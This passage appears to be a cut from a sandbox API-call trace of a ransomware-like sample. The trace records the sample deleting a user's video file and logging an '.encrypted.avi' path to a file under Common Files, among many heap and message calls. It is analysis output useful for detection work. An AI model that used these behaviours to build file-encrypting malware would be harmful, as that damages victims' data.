wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", lpFilePart=0x0) returned 0x43 [0043.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e74b20, ftCreationTime.dwHighDateTime=0x1d5bb8b, ftLastAccessTime.dwLowDateTime=0xdefd32c0, ftLastAccessTime.dwHighDateTime=0x1d5be59, ftLastWriteTime.dwLowDateTime=0x19b48900, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6c58, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="MB6 kn.avi", cAlternateFileName="MB6KN~1.AVI")) returned 0x7c2100 [0043.620] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\mb6 kn.avi")) returned 1 [0043.621] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e74b20, ftCreationTime.dwHighDateTime=0x1d5bb8b, ftLastAccessTime.dwLowDateTime=0xdefd32c0, ftLastAccessTime.dwHighDateTime=0x1d5be59, ftLastWriteTime.dwLowDateTime=0x19b48900, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6c58, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="MB6 kn.avi", cAlternateFileName="MB6KN~1.AVI")) returned 0 [0043.621] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.622] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.623] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0043.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.624] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.624] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.624] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.624] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.624] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.625] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.625] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3879, lpOverlapped=0x0) returned 1 [0043.626] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.626] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3879, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.626] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.encrypted.avi\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0043.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0043.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.encrypted.avi\r\n", cchWideChar=80, lpMultiByteStr=0x7f3688, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.encrypted.avi\r\n", lpUsedDefaultChar=0x0) returned 80 [0043.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0043.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0043.626] WriteFile (in: hFile=0x140, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4f, lpOverlapped=0x0) returned 1 [0043.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0043.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.627] CloseHandle (hObject=0x140) returned 1 [0043.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.629] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.629] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.630] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.630] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.630] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.630] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.631] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.633] HeapFree (in: 